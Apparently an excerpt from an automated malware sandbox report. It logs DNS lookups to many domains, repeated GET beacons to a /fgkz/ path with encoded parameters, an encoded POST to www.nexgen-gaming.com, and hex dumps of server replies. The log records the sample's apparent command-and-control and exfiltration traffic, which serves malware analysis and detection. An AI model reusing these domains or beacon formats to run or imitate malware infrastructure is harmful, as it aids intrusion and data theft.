                    Source: global trafficHTTP traffic detected: GET /fgkz/?4f2t8=Es1t8vCK0sN7XyYvnVVOljQ55acH3Wz1kLP2QzEOa9660+rpR75GQvSkA30bAYbOR2lPGVNfcPr7Ljt/1l/fB9BodoBufVLUjg==&nFeHa=dbNpTj HTTP/1.1Accept: */*Accept-Language: en-usHost: www.sciencebot.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /fgkz/?nFeHa=dbNpTj&4f2t8=y4FhMh12ATfkFg6tImNw7XoZ6hnl8AB4notnPujEUk+EgZuT0tb2uZJUNE/t4waZuxpptBF/Humi+b09KdNA9iSMBM18JBKWRg== HTTP/1.1Accept: */*Accept-Language: en-usHost: www.gpcamservices.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /fgkz/?4f2t8=+meHlBDXvFG0tp5IHuNp5aNfi3jbma4/KPg1jYwxKUxzXvorilFM4RqNjl5oI+tAWQpMLL6Kz03IcJJlzmvukn6IT7E7w1sf4w==&nFeHa=dbNpTj HTTP/1.1Accept: */*Accept-Language: en-usHost: www.slimdut.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /fgkz/?nFeHa=dbNpTj&4f2t8=jkJyt4aMtNKoYD5sbuFVc9QyaTZ4K2J/yr+l21//H5N/WdfnKajTYLfT/HfxXPoaC4ByuXnDUz3XZuyNEmOuuyoe00P8CgSW4g== HTTP/1.1Accept: */*Accept-Language: en-usHost: www.otomain.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /fgkz/?4f2t8=aeeJEj57mUSUfFc8r0lYWf5TLjzOukydlBenCzdgyGJ4dbEC60EhS0rD3xa7pQMeZFPdLFyN09CO6nuGrnlSNGPfsMX8qY9T/A==&nFeHa=dbNpTj HTTP/1.1Accept: */*Accept-Language: en-usHost: www.uty803.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /fgkz/?4f2t8=41Curen82hkwcHpyAWCbG1C0h00zKpR4XE7lig5tQUDuQ/w4IAvXl9Gm09xCLibXJ4gYU1q3vSZc7UEZudfqXPaUnSpi+WZhrQ==&nFeHa=dbNpTj HTTP/1.1Accept: */*Accept-Language: en-usHost: www.nathanladd.softwareConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /fgkz/?4f2t8=zruAGbX+zzZzwXhsAlQZAULZe4pnPcBNBYGP0N8wJF4ze778247Xmh3iJl2/TqyIQwvJNtjZAjEGWTxWxFAMT6BKV60sGMz7yg==&nFeHa=dbNpTj HTTP/1.1Accept: */*Accept-Language: en-usHost: www.hugelmann.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /fgkz/?nFeHa=dbNpTj&4f2t8=WwxZJefTXlbC80/BpveukZyNeg7V77XnTSoth6J++MJln1PDQgVuwSMNXVc16zr9hGsIX6790/Sw0PUDFf+oDAGEaENhNNwIZQ== HTTP/1.1Accept: */*Accept-Language: en-usHost: www.sportspaj.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /fgkz/?4f2t8=3m5S8RLi2FvoSMlAd2YNW/TJwuNR/4L3lTg0ZykUeQS0d3bBVkf5OCtf3wLO2p5Qie0G5ZQmXW/kTWMxHN/hjFLiWPmpcdZuTA==&nFeHa=dbNpTj HTTP/1.1Accept: */*Accept-Language: en-usHost: www.noobblaster.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                    Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
                    Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
                    Source: global trafficDNS traffic detected: DNS query: www.7789552398763.net
                    Source: global trafficDNS traffic detected: DNS query: www.pheonix-travels.com
                    Source: global trafficDNS traffic detected: DNS query: www.nexgen-gaming.com
                    Source: global trafficDNS traffic detected: DNS query: www.theranchobizarro.com
                    Source: global trafficDNS traffic detected: DNS query: www.heilao9.xyz
                    Source: global trafficDNS traffic detected: DNS query: www.sciencebot.sbs
                    Source: global trafficDNS traffic detected: DNS query: www.gpcamservices.com
                    Source: global trafficDNS traffic detected: DNS query: www.slimdut.top
                    Source: global trafficDNS traffic detected: DNS query: www.otomain.info
                    Source: global trafficDNS traffic detected: DNS query: www.uty803.com
                    Source: global trafficDNS traffic detected: DNS query: www.mlfloor.net
                    Source: global trafficDNS traffic detected: DNS query: www.nathanladd.software
                    Source: global trafficDNS traffic detected: DNS query: www.defengnm.com
                    Source: global trafficDNS traffic detected: DNS query: www.hugelmann.org
                    Source: global trafficDNS traffic detected: DNS query: www.sportspaj.com
                    Source: global trafficDNS traffic detected: DNS query: www.noobblaster.com
                    Source: unknownHTTP traffic detected: POST /fgkz/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-usHost: www.nexgen-gaming.comConnection: closeContent-Length: 186Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedOrigin: http://www.nexgen-gaming.comReferer: http://www.nexgen-gaming.com/fgkz/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 34 66 32 74 38 3d 47 33 37 35 42 6e 53 6c 59 64 59 7a 57 62 62 73 37 4e 48 34 43 66 4d 6b 36 6c 75 2f 4d 2b 56 30 54 75 61 6e 33 49 31 54 6c 6f 7a 4c 66 63 65 30 59 75 62 58 6a 6c 43 71 62 76 56 31 64 6f 64 78 59 44 74 62 2b 2b 37 56 2b 78 44 66 32 6a 6b 42 33 2f 44 58 5a 78 79 2f 64 33 33 2b 4f 35 78 58 73 64 6d 43 4b 69 6c 38 69 32 6e 71 33 49 32 75 34 5a 6c 52 4f 6e 75 41 46 69 31 36 66 46 31 36 35 4b 56 58 63 58 73 68 7a 69 33 4f 62 4f 59 4c 6c 76 52 49 57 63 76 4b 69 53 6b 48 70 55 4f 2b 37 2f 67 74 41 43 52 71 75 74 61 6c 51 72 56 75 30 77 3d 3d Data Ascii: 4f2t8=G375BnSlYdYzWbbs7NH4CfMk6lu/M+V0Tuan3I1TlozLfce0YubXjlCqbvV1dodxYDtb++7V+xDf2jkB3/DXZxy/d33+O5xXsdmCKil8i2nq3I2u4ZlROnuAFi16fF165KVXcXshzi3ObOYLlvRIWcvKiSkHpUO+7/gtACRqutalQrVu0w==
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.13.3Content-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatedate: Fri, 30 Aug 2024 05:19:05 GMTContent-Encoding: gzipData Raw: 61 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 5a eb 52 e3 38 16 fe cf 53 9c c9 54 2d b0 63 3b 17 a0 2f 90 b0 93 a6 43 37 b3 40 58 12 7a 76 b6 ab ab 4b b1 15 47 20 5b 6e 49 26 84 e9 7e a0 7d 8d 7d b2 3d 92 2f 71 02 2c 90 b9 54 2d 55 1d db d2 d1 b9 e9 3b 17 d9 dd fe ce 75 3b bf f3 df 1a c0 31 53 9a c5 e1 bf 68 0c 1f a8 54 4c c4 bb b0 ed b5 bc 16 ce 75 53 3d 11 72 17 ba 52 a7 12 de 49 16 32 b1 f6 18 cf e7 fe 81 eb ee af b5 bf 7b db 3f 18 fe 72 d6 83 89 8e 38 3e 17 17 4a 02 e0 24 0e 3b 35 1a d7 f6 51 a7 ec af 1d 51 4d 90 56 27 2e fd 92 b2 eb 4e ed 40 c4 9a c6 da 1d ce 12 5a 03 3f 7b ea d4 34 bd d1 75 c3 6c 0f fc 09 91 8a ea ce c5 f0 d0 7d 95 f3 ca f8 c4 24 a2 9d da 35 a3 d3 44 48 5d 59 3d 65 81 9e 74 02 7a cd 7c ea da 07 07 58 cc 34 23 dc 55 3e e1 b4 d3 74 20 22 37 2c 4a a3 62 c0 6b 38 90 2a 2a ed 33 19 e1 50 2c 16 a4 55 b5 fe a7 7b d1 75 0f 44 94 10 cd 90 b4 22 fa a8 d7 a1 41 48 ef d1 33 52 24 49 38 f3 71 89 88 5d 4d 12 77 c2 c2 09 c7 7f 55 d5 4b a1 a5 cb 34 d3 9c ee 9f 53 c2 a1 a7 34 d1 14 ce a4 48 a8 d4 33 f8 99 8e 60 c0 34 75 e0 e4 78 00 43 91 4a 07 ce 26 42 8b 50 92 64 32 73 e0 03 0b a8 68 d7 33 16 6b 55 6d 02 aa 7c c9 12 a3 4b 45 fa 9b 94 71 0d 63 21 81 84 38 a0 80 c4 01 24 25 47 04 9a f1 9b bc a2 da de 9a 59 a1 71 18 ae 69 1c 08 a9 40 0b 88 28 d5 90 26 76 d2 97 d4 28 9c 14 0a 2b 54 56 79 a8 b7 19 ba 46 e5 16 d5 3d e4 02 45 9f 21 70 72 d5 8b 89 41 af ef 79 5e 6d d1 84 2b 3a 9b 0a 19 a8 8a fe 28 8e 3b 40 ad 9b 9c 52 ac 53 31 61 56 18 80 c1 e3 80 a1 2f c9 6f 19 e7 62 ea c0 94 8e ac 9e 4e e6 84 ec e2 2f 70 a1 72 49 97 84 a1 06 12 39 55 94 31 80 51 bb f5 7a 7a e5 95 d3 9e 2f a2 3a cf 62 f7 b6 0c 8d 8c 53 a1 6e a7 26 c2 5d bb 65 15 66 bf 61 ff 6b 50 2f 94 5d 10 f1 7f 09 81 07 6c 49 25 af d8 d0 7c 88 cc 08 ff 6c 76 ac 42 3c cf a4 76 d5 9d b8 d5 53 a6 d1 56 bb b6 b2 ec c7 ca 2e ce d7 61 b2 87 43 82 79 47 c4 ca 24 48 3b c8 59 7c 85 50 e3 9d 9a 19 af c1 44 d2 71 06 0f 44 c7 74 3a f5 8c ff 48 ec 4f c4 88 dd 12 29 85 45 c9 38 63 e3 e1 4f 0d bd 76 4b 55 a7 b6 d5 ba d9 6a 15 a0 79 44 96 c9 36 d4 d5 22 f5 27 ae a1 71 13 49 91 6f 22 14 0d 56 d1 a1 2a 15 b7 88 e1 b6 c5 14 4a c1 0f 66 ba 21 e3 f4 40 70 21 2b ce fb be d1 18 f9 c1 f6 a3 59 d2 ac 3d 8a 10 88 4b 61 b5 a2 ce 3f 33 84 e8 54 c1 5c 75 3b bf ec 39 a5 67 9c aa 09 82 b8 06 1a eb 52 5e 8e 7c 85 a9 26 a2 01 23 48 82 b0 a6 b1 83 e0 ba a4 7e 16 41 4f f3 e8 08 c3 2b 30 ac ea 66 2f d0 bc a0 3e 22 fe 15 c6 4e 71 75 c7 ad d1 78 eb 55 f3 75 73 c7 33 22 0b 68 65 c1 0a 4a fa 8f 4b 21 0a 2b a6 aa 5f 7e 49 a9 9c d5 03 44 6a 7e ef 45 2c f6 2e 91 69 bb 9e f1 43 ee 73 1f 2c fd 64 2e 99 db 65 92 d9 18 b7 41 79 a1 10 21 a7 24 61 ca 8a 33 fe fe db 98 44 8c cf 3a 27 18 ed 12 0b ed 0f 47 06 97 b5 3b 1e dd bf 5f 5e fe 9b 95 be 2a 20 7c 25 c7 88 e2 2b 5a 4d 52 b5 7d 58
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.13.3Content-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatedate: Fri, 30 Aug 2024 05:19:07 GMTContent-Encoding: gzipData Raw: 61 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 5a eb 52 e3 38 16 fe cf 53 9c c9 54 2d b0 63 3b 17 a0 2f 90 b0 93 a6 43 37 b3 40 58 12 7a 76 b6 ab ab 4b b1 15 47 20 5b 6e 49 26 84 e9 7e a0 7d 8d 7d b2 3d 92 2f 71 02 2c 90 b9 54 2d 55 1d db d2 d1 b9 e9 3b 17 d9 dd fe ce 75 3b bf f3 df 1a c0 31 53 9a c5 e1 bf 68 0c 1f a8 54 4c c4 bb b0 ed b5 bc 16 ce 75 53 3d 11 72 17 ba 52 a7 12 de 49 16 32 b1 f6 18 cf e7 fe 81 eb ee af b5 bf 7b db 3f 18 fe 72 d6 83 89 8e 38 3e 17 17 4a 02 e0 24 0e 3b 35 1a d7 f6 51 a7 ec af 1d 51 4d 90 56 27 2e fd 92 b2 eb 4e ed 40 c4 9a c6 da 1d ce 12 5a 03 3f 7b ea d4 34 bd d1 75 c3 6c 0f fc 09 91 8a ea ce c5 f0 d0 7d 95 f3 ca f8 c4 24 a2 9d da 35 a3 d3 44 48 5d 59 3d 65 81 9e 74 02 7a cd 7c ea da 07 07 58 cc 34 23 dc 55 3e e1 b4 d3 74 20 22 37 2c 4a a3 62 c0 6b 38 90 2a 2a ed 33 19 e1 50 2c 16 a4 55 b5 fe a7 7b d1 75 0f 44 94 10 cd 90 b4 22 fa a8 d7 a1 41 48 ef d1 33 52 24 49 38 f3 71 89 88 5d 4d 12 77 c2 c2 09 c7 7f 55 d5 4b a1 a5 cb 34 d3 9c ee 9f 53 c2 a1 a7 34 d1 14 ce a4 48 a8 d4 33 f8 99 8e 60 c0 34 75 e0 e4 78 00 43 91 4a 07 ce 26 42 8b 50 92 64 32 73 e0 03 0b a8 68 d7 33 16 6b 55 6d 02 aa 7c c9 12 a3 4b 45 fa 9b 94 71 0d 63 21 81 84 38 a0 80 c4 01 24 25 47 04 9a f1 9b bc a2 da de 9a 59 a1 71 18 ae 69 1c 08 a9 40 0b 88 28 d5 90 26 76 d2 97 d4 28 9c 14 0a 2b 54 56 79 a8 b7 19 ba 46 e5 16 d5 3d e4 02 45 9f 21 70 72 d5 8b 89 41 af ef 79 5e 6d d1 84 2b 3a 9b 0a 19 a8 8a fe 28 8e 3b 40 ad 9b 9c 52 ac 53 31 61 56 18 80 c1 e3 80 a1 2f c9 6f 19 e7 62 ea c0 94 8e ac 9e 4e e6 84 ec e2 2f 70 a1 72 49 97 84 a1 06 12 39 55 94 31 80 51 bb f5 7a 7a e5 95 d3 9e 2f a2 3a cf 62 f7 b6 0c 8d 8c 53 a1 6e a7 26 c2 5d bb 65 15 66 bf 61 ff 6b 50 2f 94 5d 10 f1 7f 09 81 07 6c 49 25 af d8 d0 7c 88 cc 08 ff 6c 76 ac 42 3c cf a4 76 d5 9d b8 d5 53 a6 d1 56 bb b6 b2 ec c7 ca 2e ce d7 61 b2 87 43 82 79 47 c4 ca 24 48 3b c8 59 7c 85 50 e3 9d 9a 19 af c1 44 d2 71 06 0f 44 c7 74 3a f5 8c ff 48 ec 4f c4 88 dd 12 29 85 45 c9 38 63 e3 e1 4f 0d bd 76 4b 55 a7 b6 d5 ba d9 6a 15 a0 79 44 96 c9 36 d4 d5 22 f5 27 ae a1 71 13 49 91 6f 22 14 0d 56 d1 a1 2a 15 b7 88 e1 b6 c5 14 4a c1 0f 66 ba 21 e3 f4 40 70 21 2b ce fb be d1 18 f9 c1 f6 a3 59 d2 ac 3d 8a 10 88 4b 61 b5 a2 ce 3f 33 84 e8 54 c1 5c 75 3b bf ec 39 a5 67 9c aa 09 82 b8 06 1a eb 52 5e 8e 7c 85 a9 26 a2 01 23 48 82 b0 a6 b1 83 e0 ba a4 7e 16 41 4f f3 e8 08 c3 2b 30 ac ea 66 2f d0 bc a0 3e 22 fe 15 c6 4e 71 75 c7 ad d1 78 eb 55 f3 75 73 c7 33 22 0b 68 65 c1 0a 4a fa 8f 4b 21 0a 2b a6 aa 5f 7e 49 a9 9c d5 03 44 6a 7e ef 45 2c f6 2e 91 69 bb 9e f1 43 ee 73 1f 2c fd 64 2e 99 db 65 92 d9 18 b7 41 79 a1 10 21 a7 24 61 ca 8a 33 fe fe db 98 44 8c cf 3a 27 18 ed 12 0b ed 0f 47 06 97 b5 3b 1e dd bf 5f 5e fe 9b 95 be 2a 20 7c 25 c7 88 e2 2b 5a 4d 52 b5 7d 58
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.13.3Content-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatedate: Fri, 30 Aug 2024 05:19:10 GMTContent-Encoding: gzipData Raw: 61 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 5a eb 52 e3 38 16 fe cf 53 9c c9 54 2d b0 63 3b 17 a0 2f 90 b0 93 a6 43 37 b3 40 58 12 7a 76 b6 ab ab 4b b1 15 47 20 5b 6e 49 26 84 e9 7e a0 7d 8d 7d b2 3d 92 2f 71 02 2c 90 b9 54 2d 55 1d db d2 d1 b9 e9 3b 17 d9 dd fe ce 75 3b bf f3 df 1a c0 31 53 9a c5 e1 bf 68 0c 1f a8 54 4c c4 bb b0 ed b5 bc 16 ce 75 53 3d 11 72 17 ba 52 a7 12 de 49 16 32 b1 f6 18 cf e7 fe 81 eb ee af b5 bf 7b db 3f 18 fe 72 d6 83 89 8e 38 3e 17 17 4a 02 e0 24 0e 3b 35 1a d7 f6 51 a7 ec af 1d 51 4d 90 56 27 2e fd 92 b2 eb 4e ed 40 c4 9a c6 da 1d ce 12 5a 03 3f 7b ea d4 34 bd d1 75 c3 6c 0f fc 09 91 8a ea ce c5 f0 d0 7d 95 f3 ca f8 c4 24 a2 9d da 35 a3 d3 44 48 5d 59 3d 65 81 9e 74 02 7a cd 7c ea da 07 07 58 cc 34 23 dc 55 3e e1 b4 d3 74 20 22 37 2c 4a a3 62 c0 6b 38 90 2a 2a ed 33 19 e1 50 2c 16 a4 55 b5 fe a7 7b d1 75 0f 44 94 10 cd 90 b4 22 fa a8 d7 a1 41 48 ef d1 33 52 24 49 38 f3 71 89 88 5d 4d 12 77 c2 c2 09 c7 7f 55 d5 4b a1 a5 cb 34 d3 9c ee 9f 53 c2 a1 a7 34 d1 14 ce a4 48 a8 d4 33 f8 99 8e 60 c0 34 75 e0 e4 78 00 43 91 4a 07 ce 26 42 8b 50 92 64 32 73 e0 03 0b a8 68 d7 33 16 6b 55 6d 02 aa 7c c9 12 a3 4b 45 fa 9b 94 71 0d 63 21 81 84 38 a0 80 c4 01 24 25 47 04 9a f1 9b bc a2 da de 9a 59 a1 71 18 ae 69 1c 08 a9 40 0b 88 28 d5 90 26 76 d2 97 d4 28 9c 14 0a 2b 54 56 79 a8 b7 19 ba 46 e5 16 d5 3d e4 02 45 9f 21 70 72 d5 8b 89 41 af ef 79 5e 6d d1 84 2b 3a 9b 0a 19 a8 8a fe 28 8e 3b 40 ad 9b 9c 52 ac 53 31 61 56 18 80 c1 e3 80 a1 2f c9 6f 19 e7 62 ea c0 94 8e ac 9e 4e e6 84 ec e2 2f 70 a1 72 49 97 84 a1 06 12 39 55 94 31 80 51 bb f5 7a 7a e5 95 d3 9e 2f a2 3a cf 62 f7 b6 0c 8d 8c 53 a1 6e a7 26 c2 5d bb 65 15 66 bf 61 ff 6b 50 2f 94 5d 10 f1 7f 09 81 07 6c 49 25 af d8 d0 7c 88 cc 08 ff 6c 76 ac 42 3c cf a4 76 d5 9d b8 d5 53 a6 d1 56 bb b6 b2 ec c7 ca 2e ce d7 61 b2 87 43 82 79 47 c4 ca 24 48 3b c8 59 7c 85 50 e3 9d 9a 19 af c1 44 d2 71 06 0f 44 c7 74 3a f5 8c ff 48 ec 4f c4 88 dd 12 29 85 45 c9 38 63 e3 e1 4f 0d bd 76 4b 55 a7 b6 d5 ba d9 6a 15 a0 79 44 96 c9 36 d4 d5 22 f5 27 ae a1 71 13 49 91 6f 22 14 0d 56 d1 a1 2a 15 b7 88 e1 b6 c5 14 4a c1 0f 66 ba 21 e3 f4 40 70 21 2b ce fb be d1 18 f9 c1 f6 a3 59 d2 ac 3d 8a 10 88 4b 61 b5 a2 ce 3f 33 84 e8 54 c1 5c 75 3b bf ec 39 a5 67 9c aa 09 82 b8 06 1a eb 52 5e 8e 7c 85 a9 26 a2 01 23 48 82 b0 a6 b1 83 e0 ba a4 7e 16 41 4f f3 e8 08 c3 2b 30 ac ea 66 2f d0 bc a0 3e 22 fe 15 c6 4e 71 75 c7 ad d1 78 eb 55 f3 75 73 c7 33 22 0b 68 65 c1 0a 4a fa 8f 4b 21 0a 2b a6 aa 5f 7e 49 a9 9c d5 03 44 6a 7e ef 45 2c f6 2e 91 69 bb 9e f1 43 ee 73 1f 2c fd 64 2e 99 db 65 92 d9 18 b7 41 79 a1 10 21 a7 24 61 ca 8a 33 fe fe db 98 44 8c cf 3a 27 18 ed 12 0b ed 0f 47 06 97 b5 3b 1e dd bf 5f 5e fe 9b 95 be 2a 20 7c 25 c7 88 e2 2b 5a 4d 52 b5 7d 58
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.13.3Content-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatedate: Fri, 30 Aug 2024 05:19:13 GMTData Raw: 31 66 37 30 0d 0a 3c 21 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 20 20 4c 69 73 74 69 6e 67 5a 65 6e 20 56 65 72 73 69 6f 6e 3a 20 34 2e 32 2e 32 0a 20 20 41 75 74 68 6f 72 3a 20 41 72 74 75 72 20 47 72 69 67 69 6f 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 61 6c 20 45 73 74 61 74 65 20 50 72 6f 70 65 72 74 79 20 57 65 62 20 53 69 74 65 2c 20 4d 4c 53 20 54 6f 75 72 2c 20 50 68 6f 74 6f 67 72 61 70 68 79 2c 20 56 69 64 65 6f 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 69 6c 74 20 66 6f 72 20 61 67 65 6e 74 73 20 61 6e 64 20 70 68 6f 74 6f 67 72 61 70 68 65 72 73 2c 20 6d 61 72 6b 65 74 65 72 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 76 65 6e 64 6f 72 73 20 74 6f 20 6d 65 65 74 20 75 70 20 61 6e 64 20 63 72 65 61 74 65 20 70 72 6f 70 65 72 74 79 20 73 69 74 65 73 2e 20 57 65 20 70 72 6f 76 69 64 65 20 50 68 6f 74 6f 67 72 61 70 68 79 2c 20 46 6c 6f 6f 72 20 50 6c 61 6e 2c 20 56 69 64 65 6f 67 72 61 70 68 79 2c 20 53 45 4f 2e 2e 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 61 6c 2c 20 65 73 74 61 74 65 2c 20 70 72 6f 70 65 72 74 79 2c 20 70 68 6f 74 